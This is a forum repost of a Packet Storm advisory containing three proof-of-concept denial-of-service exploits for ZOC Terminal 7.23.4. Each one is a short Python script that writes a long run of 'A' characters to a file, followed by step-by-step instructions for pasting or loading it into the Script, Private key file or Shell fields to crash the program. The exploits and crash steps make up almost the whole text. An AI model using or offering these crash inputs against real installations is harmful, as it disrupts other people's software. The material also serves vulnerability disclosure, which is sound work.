ZOC Terminal 7.23.4 Denial Of Service

#151
Topic created · 1 Posts · 0 Views
  • ZOC Terminal version 7.23.4 suffers from multiple denial of service vulnerabilities.
    MD5 | 1727aa6948ca39c298dacdae351def47
    Download

    #Exploit Title:  ZOC Terminal v7.23.4  - 'Script' Denial of Service (PoC)  
    #Discovery by: Victor Mondragón  
    #Discovery Date: 2019-05-15  
    #Vendor Homepage: https://www.emtec.com  
    #Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe  
    #Tested Version: 7.23.4  
    #Tested on: Windows 7 Service Pack 1 x64  
    #Steps to produce the crash:  
    #1.- Run python code: ZOC_Terminal_scr.py and it will create a new file "exp.zrx"  
    #2.- Open ZOC Terminal  
    #3.- Select Script > Start REXX Script...   
    #4.- Select "exp.zrx" file and click "open"  
    #5.- Crashed  
    cod = "\x41" * 20000  
    f = open('exp.zrx', 'w')  
    f.write(cod)  
    f.close()  
    ----  
    #Exploit Title:  ZOC Terminal v7.23.4  - 'Private key file' Denial of Service (PoC)  
    #Discovery by: Victor Mondragón  
    #Discovery Date: 2019-05-15  
    #Vendor Homepage: https://www.emtec.com  
    #Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe  
    #Tested Version: 7.23.4  
    #Tested on: Windows 7 Service Pack 1 x64  
    #Steps to produce the crash:  
    #1.- Run python code: ZOC_Terminal_pkf.py  
    #2.- Open zoc_pkf.txt and copy content to clipboard  
    #3.- Open ZOC Terminal  
    #4.- Select File > Create SSH Key Files...   
    #5.- Select "Private key file:" field erease and Paste ClipBoard   
    #6.- Click on "Create public/private key files..."  
    #7.- Crashed  
    cod = "\x41" * 2000  
    f = open('zoc_pkf.txt', 'w')  
    f.write(cod)  
    f.close()  
    ----  
    #Exploit Title:  ZOC Terminal v7.23.4  - 'Shell' Denial of Service (PoC)  
    #Discovery by: Victor Mondragón  
    #Discovery Date: 2019-05-15  
    #Vendor Homepage: https://www.emtec.com  
    #Software Link: http://www.emtec.com/downloads/zoc/zoc7234_x64.exe  
    #Tested Version: 7.23.4  
    #Tested on: Windows 7 Service Pack 1 x64  
    #Steps to produce the crash:  
    #1.- Run python code: ZOC_Terminal_sh.py  
    #2.- Open zoc_sh.txt and copy content to clipboard  
    #3.- Open ZOC Terminal  
    #4.- Select Options > Program Settings... > Special Files  
    #5.- Select "Shell" field erease the content and Paste ClipBoard   
    #6.- Click on "Save"  
    #7.- Select View > "Command Shell" and select "ok"  
    #8.- Crashed  
    cod = "\x41" * 270  
    f = open('zoc_sh.txt', 'w')  
    f.write(cod)  
    f.close()  
    

    Source: packetstormsecurity.com

Log in to reply